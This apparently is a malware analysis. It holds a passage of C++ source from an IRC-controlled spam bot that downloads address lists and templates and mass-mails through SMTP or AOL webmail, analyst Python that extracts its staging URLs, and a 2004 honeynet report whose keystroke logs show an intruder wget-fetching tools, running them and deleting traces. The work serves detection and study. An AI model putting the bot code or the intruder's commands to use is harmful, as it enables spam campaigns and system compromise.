while(m_bSpamming && m_bTemplateSet) {
// Loop through all available threads
for(int i=0; i<iNumThreads; i++) {
// Block until the recipient list holds at least one address, re-fetching it when empty
// (loop header and this guard are reconstructed: the extraction dropped the text between "i<" and "1) {")
while(m_lEmails.size()<1) { SetList(m_sListURL); Sleep(1000); }
// Get the values
CString sEmailSrc=m_sEmailSrc;
CString sEmailSrcFull=m_sEmailSrcFull;
CString sEmailAddress=m_lEmails.front(); m_lEmails.pop_front();
CString sSubject=m_sSubject;
CString sData=m_sData;
CString sSMTPHost=sEmailAddress.Token(1, "@");
// Resolve the MX
CDNS cDNS; CString sDNS=cDNS.ResolveMX(sSMTPHost.CStr());
// Fall back to A record in case this failed
if(!sDNS.Compare("")) sDNS.Assign(sSMTPHost);
if(pSenders[i].m_bFinished) {
pSenders[i].SetMail(sEmailSrc, sEmailSrcFull, sEmailAddress, sSubject, sData);
pSenders[i].SetServer(sDNS, 25); pSenders[i].Start(false);
}
}
}
delete [] pSenders; Sleep(2000);
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
return NULL;
}
CAOL_Logic::CAOL_Logic() {
m_szType="CAOL_Logic";
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
CAOL_Logic::~CAOL_Logic() {
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
void CAOL_Logic::Init() {
REGCMD(m_cmdSetList, "aolspam.setlist", "aol - downloads an email list", false, this);
REGCMD(m_cmdSetTemplate, "aolspam.settemplate", "aol - downloads an email template", false, this);
REGCMD(m_cmdSetUser, "aolspam.setuser", "aol - sets an username", false, this);
REGCMD(m_cmdSetPass, "aolspam.setpass", "aol - sets a password", false, this);
REGCMD(m_cmdStart, "aolspam.start", "aol - starts the spamming", false, this);
REGCMD(m_cmdStop, "aolspam.stop", "aol - stops the spamming", false, this);
REGCVAR(aolspam_maxthreads, "8", "AOL Spam Logic - Number of threads", false, 0);
}
bool CAOL_Logic::HandleCommand(CMessage *pMsg) {
if(!pMsg->sCmd.Compare("aolspam.setlist")) {
m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email list.", pMsg->sReplyTo.Str());
SetList(m_sListURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email list.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.settemplate")) {
m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email template.", pMsg->sReplyTo.Str());
SetTemplate(m_sTemplateURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email template.", pMsg->sReplyTo.Str());
return true;
}
if(!pMsg->sCmd.Compare("aolspam.setuser")) {
SetUser(pMsg->sChatString.Token(1, " "));
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.setpass")) {
SetPassword(pMsg->sChatString.Token(1, " "));
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.start")) {
m_bSpamming=true;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Started spamming.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("aolspam.stop")) {
m_bSpamming=false;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Stopped spamming.", pMsg->sReplyTo.Str());
return true;
}
return false;
}
void CAOL_Logic::SetList(CString &sURL) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("list.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szList=new char[iFileSize+1];
memset(szList, 0, iFileSize+1);
fread(szList, sizeof(char), iFileSize, fp);
CString sList(szList); char *szListCopy=sList.Str(), *szTemp;
while(true) {
char *szCRLF=strstr(szListCopy, "\r");
if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
if(!szCRLF) break;
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
char *szToken=szListCopy; szListCopy=szCRLF;
if(!strcmp(szToken, "")) continue;
m_lEmails.push_back(CString(szToken));
}
delete [] szList; fclose(fp);
DeleteFile("list.tmp");
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CAOL_Logic::SetTemplate(CString &sURL) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("template.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szTemplate=new char[iFileSize+1];
memset(szTemplate, 0, iFileSize+1);
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
if(!sTemplate.Mid(0, 4).Compare("data")) break;
if(!sTemplate.Token(0, " ").Compare("from")) {
m_sEmailSrc.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("from_full")) {
m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("subject")) {
m_sSubject.Assign(sTemplate.Token(1, " ", true));
}
}
CString sDataTmp("");
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n");
}
m_sData.Assign(sDataTmp);
m_sEmailTemplate.Assign("");
delete [] szTemplate; fclose(fp);
DeleteFile("template.tmp");
m_bTemplateSet=true;
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CAOL_Logic::SetUser(CString &sUser) {
m_sUser.Assign(sUser);
}
void CAOL_Logic::SetPassword(CString &sPass) {
m_sPass.Assign(sPass);
}
void *CAOL_Logic::Run() {
return NULL; // unconditional early return: the spam loop below is unreachable as written
while(true) {
try {
int iNumThreads=aolspam_maxthreads.iValue;
CAOLWebMail *pSenders=new CAOLWebMail[iNumThreads];
// Spam loop
while(m_bSpamming && m_bTemplateSet) {
// Loop through all available threads
for(int i=0; i<iNumThreads; i++) {
// Block until the recipient list holds at least one address, re-fetching it when empty
// (loop header and this guard are reconstructed: the extraction dropped the text between "i<" and "1) {")
while(m_lEmails.size()<1) { SetList(m_sListURL); Sleep(1000); }
// Get the values
CString sEmailSrc=m_sEmailSrc;
CString sEmailSrcFull=m_sEmailSrcFull;
CString sEmailAddress=m_lEmails.front(); m_lEmails.pop_front();
CString sSubject=m_sSubject;
CString sData=m_sData;
pSenders[i].SetMail(sEmailSrc, sEmailSrcFull, sEmailAddress, sSubject, sData);
pSenders[i].Start(false);
}
}
delete [] pSenders; Sleep(2000);
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
return NULL;
}
CAOLWebMail::CAOLWebMail() { m_szType="CAOLWebMail"; m_bMailSet=false; m_bFinished=true; }
CAOLWebMail::~CAOLWebMail() { m_bMailSet=false; m_bFinished=true; }
void *CAOLWebMail::Run() {
m_bFinished=false;
while(!m_bMailSet) Sleep(1000);
Send();
m_bFinished=true;
return NULL;
}
void CAOLWebMail::SetMail(CString sMailFrom, CString sMailFromFull, \
CString sRcptTo, CString sSubject, \
CString sData) {
m_sMailFrom=sMailFrom; m_sMailFromFull=sMailFromFull;
m_sRcptTo=sRcptTo; m_sSubject=sSubject; m_sData=sData;
m_bMailSet=true;
}
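The two classes above show the bot's spam pipeline end to end: a herder issues spam.setlist and spam.settemplate with URLs over IRC, the bot fetches both files, SetTemplate splits "key value" header lines from the message body at the first line beginning with "data", and Run() resolves the MX of each recipient domain (falling back to an A record) before handing the message to a CSMTP_Sender on port 25. The Python below is an added analyst-side example, not code from the bot or from the paper: it parses a template by the same rules and picks the bot's registered command vocabulary out of IRC channel lines to recover the list and template URLs, which are the indicators every infected host will contact. The sample template and IRC lines are constructed; the "." command prefix and the reading of Token(1, " ", true) as "rest of the line" are assumptions, since neither the bot's command splitter nor its CString class is shown.

```python
"""Analyst-side helpers for the bot spam module above (added example, not bot code)."""
import re

# Command names registered with REGCMD in CSMTP_Logic::Init and CAOL_Logic::Init above.
SPAM_COMMANDS = {
    "spam.setlist", "spam.settemplate", "spam.start", "spam.stop",
    "aolspam.setlist", "aolspam.settemplate", "aolspam.setuser",
    "aolspam.setpass", "aolspam.start", "aolspam.stop",
}
HEADER_KEYS = ("from", "from_full", "subject")

# Constructed sample template in the layout SetTemplate expects.
TEMPLATE = (
    "from support@example.com\n"
    "from_full Example Support <support@example.com>\n"
    "subject Your account\n"
    "data\n"
    "<html>Please verify your account</html>\n"
)

# Constructed IRC channel traffic; 203.0.113.7 is a documentation address.
IRC_LOG = [
    ":herder!~h@10.0.0.9 PRIVMSG #chan :.spam.settemplate http://203.0.113.7/t.txt",
    ":herder!~h@10.0.0.9 PRIVMSG #chan :.spam.setlist http://203.0.113.7/list.txt",
    ":herder!~h@10.0.0.9 PRIVMSG #chan :.spam.start",
    ":someone!~u@10.0.0.5 PRIVMSG #chan :hi all",
]

PRIVMSG = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")


def parse_template(text):
    """Split a template the way SetTemplate does.

    Header lines are "key value" pairs (keys from, from_full, subject); the first
    line beginning with "data" ends the header block and every following line is
    body, re-joined with CRLF. Token(1, " ", true) is assumed to return the rest
    of the line after the first space (an assumption about the bot's CString).
    """
    headers = dict.fromkeys(HEADER_KEYS, "")
    lines = text.splitlines()
    body_start = len(lines)
    for i, line in enumerate(lines):
        if line.startswith("data"):
            body_start = i + 1
            break
        key, _, rest = line.partition(" ")
        if key in headers:
            headers[key] = rest
    headers["data"] = "".join(l + "\r\n" for l in lines[body_start:])
    return headers


def extract_commands(irc_lines, prefix="."):
    """Return (nick, target, command, argument) for every PRIVMSG whose first word
    is one of the bot's spam commands. The leading prefix character is an
    assumption; the code that splits sCmd off sChatString is not shown above."""
    found = []
    for line in irc_lines:
        m = PRIVMSG.match(line)
        if not m:
            continue
        words = m["text"].split()
        if not words:
            continue
        cmd = words[0][len(prefix):] if words[0].startswith(prefix) else words[0]
        if cmd in SPAM_COMMANDS:
            found.append((m["nick"], m["target"], cmd, words[1] if len(words) > 1 else ""))
    return found


def staging_urls(commands):
    """URLs the herder told the bots to fetch. The list and template hosts are the
    indicators worth blocking or watching, because every bot in the channel will
    contact them before the first message goes out."""
    return [arg for _, _, cmd, arg in commands
            if cmd.endswith((".setlist", ".settemplate")) and arg]


if __name__ == "__main__":
    print(parse_template(TEMPLATE))
    cmds = extract_commands(IRC_LOG)
    for nick, target, cmd, arg in cmds:
        print(f"{nick} -> {target}: {cmd} {arg}".rstrip())
    print("staging URLs:", staging_urls(cmds))
```

Run against a channel capture, the staging URLs come out before the bots start sending, which is the moment a network operator still has to block the template host; once spam.start is seen, each bot will also begin MX lookups for every recipient domain followed by outbound connections to port 25, a pattern no ordinary workstation produces.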
================================================================================
Date: 20040802
Splitting data into pcap files for each honeypot, please wait (20040802):
-------------------------------------------------------------------------
Pot: 10.2.1.145 [ 5732 EVENTS ]
Pot: 10.2.1.146 [ 40635 EVENTS ]
Pot: 10.2.1.147 [ 2648 EVENTS ]
Outbound HTTP GETs to TCP port 80 (20040802):
---------------------------------------------
Pot: 10.2.1.145 [ 0 HTTP GETs ]
Pot: 10.2.1.146 [ 10 HTTP GETs ]
13228 2004-08-02 17:16:35.393855 10.2.1.146 -> 64.202.XXX.XXX HTTP GET /x/qd HTTP/1.0
16191 2004-08-02 20:10:36.677479 10.2.1.146 -> 64.202.XXX.XXX HTTP GET /x/qd HTTP/1.0
16309 2004-08-02 20:11:17.559758 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/p.tar.gz HTTP/1.0
25708 2004-08-02 20:22:39.019922 10.2.1.146 -> 66.218.XXX.XXX HTTP GET /sslstop.tar.gz HTTP/1.0
25815 2004-08-02 20:22:53.337162 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/psy.tgz HTTP/1.0
27077 2004-08-02 20:37:13.767699 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/pico.tgz HTTP/1.0
31515 2004-08-02 21:10:13.493600 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/socklist.tgz HTTP/1.0
31923 2004-08-02 21:16:28.377246 10.2.1.146 -> 212.15.XXX.XXX HTTP GET /cgi-bin/tek HTTP/1.0
32168 2004-08-02 21:23:09.818275 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/mech.tgz HTTP/1.0
Pot: 10.2.1.147 [ 0 HTTP GETs ]
FTP GETs to TCP port 20 (20040802):
-----------------------------------
Pot: 10.2.1.145 [ 0 FTP GETs ]
Pot: 10.2.1.146 [ 0 FTP GETs ]
Pot: 10.2.1.147 [ 0 FTP GETs ]
IRC privmsg messages (20040802):
--------------------------------
Pot: 10.2.1.145 [ 0 IRC messages ]
Pot: 10.2.1.146 [ 613 IRC messages ]
CNOTICE Ede.NL.eu.example.org CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=20 NICKLEN=12 MAXNICKLEN=15 :are supported by this server
#TheExample Crystal!~Case@Creature.users.example.org TaLenT_ nick Mirabela
#TheExample Crystal!~Case@Creature.users.example.org GesT_ nick Mirabela
#TheExample Crystal!~Case@Creature.users.example.org _aLenT___ nick Gagica
#TheExample Crystal!~Case@Creature.users.example.org GesT__ nick Roscata
#TheExample Crystal!~Case@Creature.users.example.org GesT___ nick Maimuta
#TheExample Crystal!~Case@Creature.users.example.org GesT_ nick GaOz
#TheExample Crystal!~Case@Creature.users.example.org TaLenT___ nick Salbatica
#TheExample Crystal!~Case@Creature.users.example.org Belea_ nick Bronzata
#TheExample Crystal!~Case@Creature.users.example.org Belea___ nick Creatza
Pot: 10.2.1.147 [ 0 IRC messages ]
Sebek keystroke logs (20040802):
--------------------------------
Pot: 10.2.1.145 [ 12 Sebek records ]
Pot: 10.2.1.146 [ 54 Sebek records ]
[2004-08-02 15:23:16 10.2.1.146 20025 bash/sh 48]TERdcfl=
[2004-08-02 15:23:16 10.2.1.146 20025 bash 48]uname;
[2004-08-02 18:17:18 10.2.1.146 20444 bash/sh 48]TERmd b
[2004-08-02 18:17:18 10.2.1.146 20444 bash 48]unam;i
[2004-08-02 18:17:34 10.2.1.146 20444 bash 48]cd tls
[2004-08-02 18:17:37 10.2.1.146 20444 bash 48]cd ls
[2004-08-02 18:17:43 10.2.1.146 20444 bash 48]cd /ls
[2004-08-02 18:17:57 10.2.1.146 20444 bash 48]wgetmtar
[2004-08-02 18:28:09 10.2.1.146 20473 bash 0]sockwgetrtar./sels
[2004-08-02 18:28:35 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:28:42 10.2.1.146 26994 bash 0]cd .var.t[BS][BS][BS][BS][BS][BS]/ca[BS][BS]var/tmp
[2004-08-02 18:28:42 10.2.1.146 26994 bash 0]ks
[2004-08-02 18:28:44 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:29:07 10.2.1.146 26994 bash 0]wgetmsa
[2004-08-02 18:29:16 10.2.1.146 26994 bash 0]tar tcd st
[2004-08-02 18:29:19 10.2.1.146 26994 bash 0]./ss
[2004-08-02 18:29:19 10.2.1.146 26990 sendmail 0]lsc.var.t/cavar/tmpksls
[2004-08-02 18:29:21 10.2.1.146 26994 bash 0]cd ..
[2004-08-02 18:29:27 10.2.1.146 26994 bash 0]wgetrcit
[2004-08-02 18:32:26 10.2.1.146 26994 bash 0]tar cd .ls
[2004-08-02 18:32:30 10.2.1.146 26994 bash 0]pico psybc
[2004-08-02 18:33:19 10.2.1.146 26994 bash 0]wgetdx.
[2004-08-02 18:40:09 10.2.1.146 26994 bash 0]wget XXX/picog
[2004-08-02 18:40:32 10.2.1.146 26994 bash 0]cds [BS][BS] ..
[2004-08-02 18:40:38 10.2.1.146 26994 bash 0]wgetroeg
[2004-08-02 18:57:10 10.2.1.146 26994 bash 0]tar vt
[2004-08-02 18:57:13 10.2.1.146 26994 bash 0]mv p /
[2004-08-02 18:57:15 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:57:18 10.2.1.146 26994 bash 0]cd
[2004-08-02 18:57:19 10.2.1.146 26994 bash 0]ls
[2004-08-02 18:57:28 10.2.1.146 26994 bash 0]picoar
[2004-08-02 19:11:41 10.2.1.146 26994 bash 0]w[BS]cd /var/tmp
[2004-08-02 19:11:42 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:12:04 10.2.1.146 26994 bash 0]c[BS]ww[BS]get XXX[BS].com/Arhv[BS]ive/\[BS][BS][BS][BS][BS][BS]hive/socklist.tgz
[2004-08-02 19:18:10 10.2.1.146 26994 bash 0]tar v
[2004-08-02 19:18:13 10.2.1.146 26994 bash 0]tar fsock.
[2004-08-02 19:18:15 10.2.1.146 26994 bash 0]mv slr
[2004-08-02 19:18:18 10.2.1.146 26994 bash 0]socklist
[2004-08-02 19:21:29 10.2.1.146 26994 bash 0]ps nx[BS][BS]ax
[2004-08-02 19:21:50 10.2.1.146 26994 bash 0]wget-.vt
[2004-08-02 19:29:56 10.2.1.146 26990 sendmail 0].lspico cd .lscdlswcd /var/tmplscwwget XXX/.com/Arhvive/\hive/socklist.tgzsocklistps nxax
[2004-08-02 19:30:31 10.2.1.146 26994 bash 0]tar mcd e./mecd ..
[2004-08-02 19:30:32 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:30:34 10.2.1.146 26994 bash 0]rm -rf *z
[2004-08-02 19:30:36 10.2.1.146 26994 bash 0]rm -rf p
[2004-08-02 19:30:38 10.2.1.146 26994 bash 0]rm -rf p.c
[2004-08-02 19:30:46 10.2.1.146 26994 bash 0]rm -rf sto[BS][BS]slstop
[2004-08-02 19:30:47 10.2.1.146 26994 bash 0]ls
Pot: 10.2.1.147 [ 18 Sebek records ]
[2004-08-02 15:22:15 10.2.1.147 5039 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:16 10.2.1.147 5040 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:18 10.2.1.147 5041 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:19 10.2.1.147 5042 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:21 10.2.1.147 5043 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:22 10.2.1.147 5044 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:24 10.2.1.147 5045 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:25 10.2.1.147 5046 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:27 10.2.1.147 5047 sshd 0]SSH-2.0-libssh-0.1
Re-assembling interesting TCP streams (20040802):
-------------------------------------------------
Pot: 10.2.1.145 [ 6 interesting TCP streams ]
Pot: 10.2.1.146 [ 32 interesting TCP streams ]
Pot: 10.2.1.147 [ 5 interesting TCP streams ]
Extracted files downloaded by HTTP (20040802):
----------------------------------------------
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2619/p.tar.gz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2673/psy.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_2723/pico.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_4384/socklist.tgz
/tmp/output/20040802/10.2.1.146/extracted_files/66.218.XXX.XXX/session_2670/sslstop.tar.gz
/tmp/output/20040802/10.2.1.146/extracted_files/213.218.XXX.XXX/session_4440/mech.tgz
Extracted files downloaded by FTP (20040802):
---------------------------------------------
<none>
================================================================================
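The report above is the output of the honeynet's daily processing script: per-honeypot event counts, outbound HTTP GETs, IRC traffic, Sebek keystroke records (with [BS] marking a backspace) and the files carved out of the captures. The Python below is an added triage example, not the project's script: it re-reads an excerpt of those lines (copied from the report, masked addresses kept as printed), flags outbound fetches of archives as tool staging, replays the [BS] markers so the commands actually run on 10.2.1.146 become readable, and measures the burst of identical SSH client banners on 10.2.1.147, which is what a password-guessing tool looks like from inside the host. The 60-second window and the archive-extension list are choices made for this example.

```python
"""Triage helpers for the honeynet daily report format shown above (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Excerpt of the report above (constructed sample, masked addresses left as printed).
REPORT = r"""
13228 2004-08-02 17:16:35.393855 10.2.1.146 -> 64.202.XXX.XXX HTTP GET /x/qd HTTP/1.0
16309 2004-08-02 20:11:17.559758 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/p.tar.gz HTTP/1.0
25708 2004-08-02 20:22:39.019922 10.2.1.146 -> 66.218.XXX.XXX HTTP GET /sslstop.tar.gz HTTP/1.0
32168 2004-08-02 21:23:09.818275 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/mech.tgz HTTP/1.0
[2004-08-02 18:28:42 10.2.1.146 26994 bash 0]cd .var.t[BS][BS][BS][BS][BS][BS]/ca[BS][BS]var/tmp
[2004-08-02 19:11:41 10.2.1.146 26994 bash 0]w[BS]cd /var/tmp
[2004-08-02 19:12:04 10.2.1.146 26994 bash 0]c[BS]ww[BS]get XXX[BS].com/Arhv[BS]ive/\[BS][BS][BS][BS][BS][BS]hive/socklist.tgz
[2004-08-02 19:21:29 10.2.1.146 26994 bash 0]ps nx[BS][BS]ax
[2004-08-02 19:30:34 10.2.1.146 26994 bash 0]rm -rf *z
[2004-08-02 15:22:15 10.2.1.147 5039 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:16 10.2.1.147 5040 sshd 0]SSH-2.0-libssh-0.1
[2004-08-02 15:22:18 10.2.1.147 5041 sshd 0]SSH-2.0-libssh-0.1
"""

# "<frame> <date> <time> <src> -> <dst> HTTP GET <path> HTTP/1.x"
HTTP_GET = re.compile(
    r"^\d+ (?P<ts>\S+ \S+) (?P<src>\S+) -> (?P<dst>\S+) HTTP GET (?P<path>\S+) HTTP/"
)
# "[<date> <time> <pot> <pid> <cmd> <uid>]<keystrokes>"
SEBEK = re.compile(
    r"^\[(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<pot>\S+) (?P<pid>\d+) "
    r"(?P<cmd>\S+) (?P<uid>\d+)\](?P<keys>.*)$"
)
ARCHIVE = re.compile(r"\.(?:tgz|tar\.gz|tar|tbz2|zip)$")
SSH_BANNER = re.compile(r"^SSH-\d\.\d-")


def apply_backspaces(keys):
    """Replay Sebek's [BS] markers so the command the intruder finally ran is recovered."""
    out = []
    for tok in re.split(r"(\[BS\])", keys):
        if tok == "[BS]":
            if out:
                out.pop()
        else:
            out.extend(tok)
    return "".join(out)


def max_in_window(times, window_s=60):
    """Largest number of events that fall inside any span of window_s seconds."""
    times = sorted(times)
    best, lo = 0, 0
    for hi, t in enumerate(times):
        while (t - times[lo]).total_seconds() > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def analyse(report):
    """Return archive downloads, recovered shell commands and SSH banner bursts per pot."""
    archive_downloads, shell_commands = [], []
    ssh_times = defaultdict(list)
    for line in report.splitlines():
        m = HTTP_GET.match(line)
        if m:
            # A compromised host pulling tarballs from the outside is tool staging
            if ARCHIVE.search(m["path"]):
                archive_downloads.append((m["src"], m["dst"], m["path"]))
            continue
        m = SEBEK.match(line)
        if not m:
            continue
        if m["cmd"] == "sshd" and SSH_BANNER.match(m["keys"]):
            # Sebek records the client's version string once per sshd child; many
            # identical banners seconds apart are a password-guessing tool at work.
            ssh_times[m["pot"]].append(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"))
        elif m["cmd"].startswith("bash"):
            shell_commands.append((m["pot"], m["pid"], apply_backspaces(m["keys"])))
    ssh_burst = {pot: max_in_window(ts) for pot, ts in ssh_times.items()}
    return {
        "archive_downloads": archive_downloads,
        "shell_commands": shell_commands,
        "ssh_burst": ssh_burst,
    }


if __name__ == "__main__":
    result = analyse(REPORT)
    for src, dst, path in result["archive_downloads"]:
        print(f"{src} fetched {path} from {dst}")
    for pot, pid, cmd in result["shell_commands"]:
        print(f"{pot} pid {pid}: {cmd}")
    print("SSH banner burst per pot:", result["ssh_burst"])
```

The backspace replay matters more than it looks: the raw Sebek line "ps nx[BS][BS]ax" reads as noise, but after replay it is "ps ax", and the long wget line collapses to the exact archive the intruder staged, matching the socklist.tgz entry in the HTTP GET and extracted-files sections of the same report.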